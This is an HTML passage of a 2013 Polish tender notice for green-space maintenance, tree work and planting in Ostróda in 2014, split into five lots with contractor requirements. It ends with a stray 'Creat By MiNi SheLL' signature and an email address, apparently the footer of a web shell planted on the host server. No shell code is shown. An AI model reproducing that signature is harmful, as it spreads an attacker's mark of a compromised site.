3. Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającego nie później niż do końca dnia w którym, upływa połowa wyznaczonego terminu składania ofert, tj. do dnia 27.11.2013r.
5. Termin wykonania zamówienia- część 1, 2, 3, 4, 5 od 1 stycznia 2014r. do dnia 31 grudnia 2014r.
6. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest:
1) Przedłożyć dokumenty potwierdzające, że osoby, wskazane w załączonym do oferty wykazie osób:
- osoba wskazana do koordynacji prowadzonych prac i zarazem odpowiedzialna za prawidłowe świadczenie usługi w zakresie utrzymania i pielęgnacji zieleni miejskiej, posiada przygotowanie do zawodu o profilu ogrodniczym lub rolniczym;
- osoba wskazana do wykonywania wycinki oraz cięć pielęgnacyjnych i sanitarnych drzew, posiada wymagane w tym zakresie uprawnienia.
2) Przedstawić Zamawiającemu umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta wybrana jako najkorzystniejsza została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Przedłożyć Zamawiającemu opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum: Część 1, 2- 140.000,00 PLN; Część 3- 30.000,00 PLN; Część 4, 5- 40.000,00 PLN.
Wykonawca jest zobowiązany do posiadania aktualnego ubezpieczenia w w/w zakresie i w w/w kwocie, przez cały okres realizacji przedmiotu umowy oraz do udokumentowania jej posiadania na każde żądanie Zamawiającego, na dowolnym etapie realizacji przedmiotu zamówienia.
7. Dokumenty potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesja, zezwolenie lub licencja, o których mowa w Sekcji III.4.1) niniejszego ogłoszenia to: Zezwolenie na zbieranie odpadów wydane przez Starostę Powiatu Ostródzkiego oraz zezwolenie na transport odpadów wydane przez starostę właściwego ze względu na miejsce siedziby lub zamieszkania wykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek w parkach na terenie miasta Ostróda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek w parkach na terenie miasta Ostróda, (pow. terenów zielonych 67.670m2), w zakresie zgodnym z wykazem terenów zieleni miejskiej (zał. nr 5a do siwz), wykazem prac objętym zamówieniem (zał. nr 6 do siwz), załącznikami graficznymi (zał. nr 7 do siwz), wykazem nasadzeń (zał. nr 8a do siwz) oraz zgodnie z projektem umowy (zał. nr 3a do siwz).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek na terenie miasta Ostróda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrzymanie i konserwacja zieleni miejskiej wraz z oczyszczaniem nawierzchni alejek na terenie miasta Ostróda (pow. zieleni miejskiej- 60.870m2), w zakresie zgodnym z wykazem terenów zieleni miejskiej (zał. nr 5b do siwz), wykazem prac objętym zamówieniem (zał. nr 6 do siwz), załącznikami graficznymi (zał. nr 7 do siwz), wykazem nasadzeń (zał. nr 8b do siwz) oraz zgodnie z projektem umowy (zał. nr 3b do siwz).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doraźne utrzymanie i konserwacja zieleni miejskiej na terenie miasta Ostróda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Doraźne utrzymanie i konserwacja zieleni miejskiej na terenie miasta Ostróda (w tym: koszenie traw i chwastów- 30.000m2; wygrabienie liści z trawników- 30.000m2; ciecia pielęgnacyjne żywopłotów- 1.000mb; zbieranie z trawników papierów, butelek oraz innych odpadów- 30.000m2), w zakresie zgodnym z wykazem prac objętym zamówieniem (zał. nr 6 do siwz), oraz zgodnie z projektem umowy (zał. nr 3c do siwz), zakres rzeczowy i terminy realizacji usługi wg wskazań Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wycinka oraz cięcia pielęgnacyjne i sanitarne drzew na pozostałych terenach miejskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wycinka oraz cięcia pielęgnacyjne i sanitarne drzew na pozostałych terenach miejskich (wycinka drzew- ok. 220 szt. / rok; ciecia pielęgnacyjne i sanitarne drzew- 1.350 gałęzi i konarów/rok; powierzchniowe usunięcie samosiewów drzew i krzewów- 200 m2/rok), w zakresie zgodnym z opisem wycinki drzew (zał. nr 9 do siwz) oraz zgodnie z projektem umowy (zał. nr 3d do siwz), zakres rzeczowy i terminy realizacji usługi wg wskazań Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie nasadzeń w murkach przy ul. Czarnieckiego wraz z ich pielęgnacją oraz pielęgnacją rabaty przy ul. Jana Pawła II i ul. Czarnieckiego- ul. Sienkiewicza w Ostródzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie nasadzeń w murkach przy ul. Czarnieckiego wraz z ich pielęgnacją oraz pielęgnacją rabaty przy ul. Jana Pawła II i ul. Czarnieckiego- ul. Sienkiewicza w Ostródzie, w zakresie zgodnym z wykazem terenów zieleni miejskiej (zał. nr 5e do siwz), wykazem prac objętym zamówieniem (zał. nr 6 do siwz), załącznikami graficznymi (zał. nr 7 do siwz), wykazem nasadzeń (zał. nr 8e do siwz) oraz zgodnie z projektem umowy (zał. nr 3e do siwz).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com